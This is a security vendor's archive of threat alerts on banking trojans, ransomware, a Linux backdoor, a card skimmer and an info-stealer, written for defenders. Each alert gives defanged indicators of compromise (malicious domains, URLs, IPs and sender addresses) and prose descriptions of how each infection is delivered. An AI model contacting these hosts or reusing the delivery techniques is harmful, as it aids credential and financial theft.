Archive for category Threats

Rewterz Threat Alert – Malspam Campaigns Spreading Dridex Banking Trojan

Severity

High

Analysis Summary

Dridex also known as Bugat and Cridex is a form of malware that specializes in stealing bank credentials via a system that utilizes macros from Microsoft Word. Recent malspam campaigns have been observed delivering the Dridex banking malware on windows systems. The phishing emails contain a word or excel attachment with embedded macros. Once the target downloads the file and enables macros, Dridex is downloaded on the victim machine which may lead to financial theft.
The primary objective of this software is to steal banking information from users of infected machines to immediately launch fraudulent transactions. Bank information for the software installs a keyboard listener and performs injection attacks.

Impact

  • Theft of banking information
  • Fraudulent transactions
  • Financial loss

Indicators of Compromise

From Email

  • jclugo[@]nanodepot[.]mx
  • comprobantes[@]aviso[.]com[.]gt
  • trafficmxp[@]archive[.]airindia[.]it
  • rh[.]esod[@]atlanticahotels[.]com[.]br
  • atendimento[@]turboautocenter[.]com[.]br
  • info[@]centrotimarzignano[.]it
  • jcarrere[@]bld[.]com[.]ar
  • syful[@]comillaonline[.]com
  • ricardo[@]4rtransportes[.]com[.]br
  • gerentecompras[@]mayoreoferrefama[.]com
  • citas[@]portadacartagena[.]com
  • k-inagaki[@]link-vision[.]com
  • faturamentopm[@]coopmetro[.]com[.]br
  • dvalera[@]abastosbicentenario[.]gob[.]ve
  • ventas3[@]distribuidoradeaceros[.]mx
  • m[.]biec[@]gotec-group[.]com
  • informacion[@]actgrupo[.]com
  • contabilidad[@]insalus[.]es

MD5

  • ba87bd0a355d24ddc39c8cb2c7186abf
  • 05ffb09ff7900cb970c245f94506dd7f
  • 28bdba10872356b1887dcf0b70990ffc
  • a2eb8748c37efcb2ecba817b754d7871
  • 923384cd1063c03f8e0bb44965187be7
  • 9d68dec7048ab46ee26f2cf8ddfec07f
  • 1daef4e6d1e3263d364ca28b599fdd21
  • f506a9e9b77f160026f46947c18a2b8a

SHA-256

  • 6ddf5c04bca8882d1fdb7e4885c86b07876c907bd1fef61cf5545eedfc6b03e7
  • 21de494751a16dca9bce6ace38e1d7be7a7846fb1d9a4a3c4e82b0f9db6e1e0a
  • 690052ad639bf1c44de6fc385247b19f3b4254585208082bb7231cf28c3ff95e
  • d166416b665534fca9dec4b205a0c1f28fdd5dd2cb45b92be8a908c4d35f652a
  • 87011e99a114ccff3994c196876d90e0f8627b2e040884cfbbb44033bbc22ac7
  • 017d4751de322d3cfebbe452f28ea4b16f3412307c6567d9cb7790eac7dc4175
  • 5203f290148afad7aec1493d56c43d0df5710e6a7c23ea2c1326f73ed7861d90
  • 6b1b3cd62ba169a9be6e71d013a52575111b3a15d0cb3bace971031b82057411

Source IP

  • 65[.]99[.]252[.]241
  • 93[.]38[.]63[.]46
  • 103[.]229[.]85[.]12
  • 62[.]112[.]65[.]20
  • 124[.]108[.]39[.]115
  • 190[.]202[.]150[.]26
  • 198[.]1[.]68[.]89
  • 200[.]69[.]233[.]197
  • 162[.]241[.]182[.]168
  • 174[.]142[.]9[.]228
  • 72[.]47[.]249[.]132
  • 91[.]142[.]215[.]72

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download files attached in emails coming from untrusted sources.
  • Do not enable macros for untrusted files.

Rewterz Threat Alert – McDonalds-Themed Facebook Malvertising Deploys Mispadu Banking Trojan

Severity

High

Analysis Summary

The Mispadu banking trojan is using a McDonalds malvertising tactic to ultimately steal payment-card data and online banking information. Written in Delphi, Mispadu targets Brazil and Mexico, uses pop-up windows and contains backdoor functionality.

Figure06_FacebookAds-300x258.png

Mispadu spreads via email as well as sponsored advertisements on Facebook. These offer fake discount coupons for McDonalds as shown above. If someone clicks the ad, they’re taken to a phony McDonalds website with a button that says, “I want!/Generate coupon.” Clicking this in turn downloads a ZIP archive to the victim machine containing an MSI installer. The MSI installer sets off a chain Visual Basic Scripts (VBS scripts) that ultimately end with a loader, which checks the language identifier of the target to verify that it is indeed located in Brazil or Mexico, sets up configuration files, connects to its command-and-control (C2) server and downloads the banking trojan. As for its backdoor functionality, Mispadu can take screenshots, simulate mouse and keyboard actions, and capture keystrokes. It collects computer fingerprinting information about its victim machines, and checks to see if regional security applications are installed on the target machine. It also of course monitors for installed banking applications, and also monitors the content of the clipboard and tries to replace potential bitcoin wallets with its own.

This malware extracts stored credentials from browsers (Google Chrome, Mozilla Firefox, Internet Explorer), and email clients (Microsoft Outlook, Mozilla Thunderbird, and Windows Live Mail, among others). Mispadu is originally an ambitious Latin American banking trojan that utilizes malvertising and extends its attack surface to web browsers. In Brazil, it was seen distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system. It also siphons list of installed common Latin American banking applications and a list of installed security products.

Impact

  • Credential Theft
  • Key logging
  • Unauthorized Remote Access
  • Theft of credit card/banking data
  • Financial loss

Indicators of Compromise

Domain Name

promoscupom[.]cf

Hostname

mcdonalds[.]promoscupom[.]cf

MD5

  • 525e86186b017bfbbdef82802dba6950
  • 54e8ded7b148a13d3363ac7b33f6eb06
  • 0ea4196141215c3148054f029fc9c96a
  • 053d613849ee008f5a1967bf0219d406
  • 024ff6c7fff97103fe81120aea96da94
  • e60bad975bbec25fe5d26298a3eafbe4

SHA-256

  • 0e3c89fa4d61b5430e3a0949b86058b0873f4c807cba87d687c81d3ad4412ed4
  • 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
  • 8b9e03bea2dfc1ce375cbff63927b7f0f51cbd0d8e74557e9a54c9a361e709b0
  • f3e6a1dbb374e4926f55d3905c70bf30ee59281de6fa96aa34ba6d9e624a8b0e
  • 6ed32f46a595a4097d85e7f70c74be5a57b542595088e81074ad8197901ba7aa

URL

  • http[:]//mcdonalds[.]promoscupom.cf/index1[.]html
  • http[:]//promoscupom[.]cf/ http[:]//3.19.223[.]147/br/mp1a
  • http[:]//mcdonalds.promoscupom[.]cf/index3.html
  • http[:]//mcdonalds.promoscupom[.]cf/index2.html

Remediation

  • Block the threat indicators at their respective controls.
  • Do not click on random advertisements even if they look appealing and harmless.
  • Keep browsers updated to latest versions and avoid using unnecessary extensions.

Rewterz Threat Alert – Buran Ransomware Infects PCs via Microsoft Excel Web Queries

Severity

High

Analysis Summary

A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.

A new malspam campaign was discovered by security researcher Suspicious Link that pretends to be a simple fwd of a previous email stating that the user should “Print document in attach”.

Malspam Email

This attached document is an IQY file that when opened will execute a web query, or remote command, given by a remote server that uses PowerShell to install the Buran Ransomware. IQY files, they are Excel Web Query documents that when opened will attempt to import data into a worksheet using external sources. For example, as shown below, the attached IQY file is simply a text file that specifies its data will come from the web and be retrieved from the listed URL.

IQY Attachment

The data returned from an external source can also be an formula that is then executed by Excel when the IQY file is opened. In this particular case, the formula will launch a PowerShell command that downloads a remote Buran Ransomware executable named 1.exe, saves it to the Temp folder, and then executes it.

Remote command to execute

Like malicious macros, users first need to enable the data source, but as we have seen with other spam campaigns, too many people blindly click on the Enable button.

IQY File in Excel

If the user clicks on Enable, the 1.exe file will be downloaded and executed, which will start to encrypt the files on the computer.

Buran Encrypted Files
Buran Ransom Note

Impact

File encryption

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Users can also block IQY files in Excel.

Rewterz Threat Alert – A New Multiplatform Backdoor Targeting Linux

Severity

Medium

Analysis Summary

A New Multiplatform Backdoor targeting Linux which does not have any known connections to other threat groups.

Technical Analysis

The Linux binary is a statically linked ELF file, while the Windows binary is a dynamically linked PE file.

Both instances of this malware are practically identical in terms of overall functionality, with minor implementation differences. However, if we pay close attention to each instance we can draw some conclusions regarding the nature of the authors.

Both malware instances share the same protocol to communicate with the same CNC server. However, these instances have different delivery vectors:

2019 11 12 000451 807x440 scrot

Backdoor Analysis

The Windows variant of this malware does not represent a complex threat in terms of Windows malware. Conversely, the Linux variant shows more sophistication in regards to the implementation details used to replicate the same functionality.

2019 11 12 110915 702x99 scrot

This indicates information regarding the malware authors’ development environment preference.

The main function is not obfuscated and appears to be straightforward in logic. In the Windows variant we can see how some strings are decoded in the beginning of the function.

2019 11 12 111229 712x581 scrot
2019 11 12 112102 603x541 scrot

Impact

  • Arbitrary execution of shell commands
  • Arbitrary binary execution

Indicators of Compromise

IP

  • 185[.]198[.]56[.]53
  • 193[.]29[.]15[.]147

SHA-256

  • 5d51dbf649d34cd6927efdb6ef082f27a6ccb25a92e892800c583a881bbf9415
  • 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Alert – New JavaScript Skimmer Found on Ecommerce Sites

Severity

Medium

Analysis summary

Security researchers at Visa have uncovered a new type of JavaScript skimmer that has infected the online checkout pages for at least 17 ecommerce websites in an effort to steal payment card data. This newly discovered skimmer, dubbed “Pipka,” has the ability to remove itself from the HTML of a compromised payment website after it executes, enabling it to avoid security detection, according to the Visa researchers.

After first finding Pipka, the Visa researchers discovered the skimmer on at least 16 other online checkout pages at ecommerce sites. As with other skimmers, Pipka is designed to extract payment card account number, expiration date, card verification value number, cardholder name and address.

visaskimmercode.jpg

The creators of Pipka incorporated the self-removal technique as an extra layer of defense against security software. And while this type of avoidance technique has been spotted with desktop malware, it has not been previously incorporated into JavaScript skimmers.

Impact

Financial loss

Remediation

  • Ensure the e shopping cart, other services, and all software are upgraded or patched regularly.
  • Scan and test for vulnerabilities or malware regularly.
  • Implementation of best practices for securing e commerce.

Rewterz Threat Alert – Azorult Malware – Active IoCs

Severity

High

Analysis Summary

Active IoCs have been retrieved linked to the Azorult malware, that target and infect victims with the Azorult stealer.

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.

The malware can also be used as a loader to download other malware. Indicators of compromise are given below.

Impact

  • Credential Theft
  • Exposure of sensitive information

Indicators of Compromise

Domain Name

dark-team[.]pw

MD5

  • 622e4013a109c98ba384b8ae94ad1c80
  • 8a409f6268cb227a491ebb833233605b
  • cf964e65a1be0be2335c69886108601e

SHA-256

  • 1e880dce0c52262a8c7c2dc3ed5b5daf0391ba58f77e3a48ef5e3c915bbcb7ad
  • 29e50b5023569b3456abfae6a9c217ebfe35d96539cea8b2e3bef63bc3fee326
  • 253c3edecb73720d031f2bc91d032f8e2092fb239808e2c7070fc9bb82d31826

SHA1

  • f7cf88068f3909f4459e98bbe2e66ecd89a86975
  • f0592fc9980dc22f05d467801246cde6d81a5130
  • fd672d3b705dc0515bb38f513581edcf9d3f0a74

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download/execute untrusted files.
  • Do not respond to untrusted emails.
  • Do not visit links attached in untrusted emails.

Copyright © Rewterz. All rights reserved.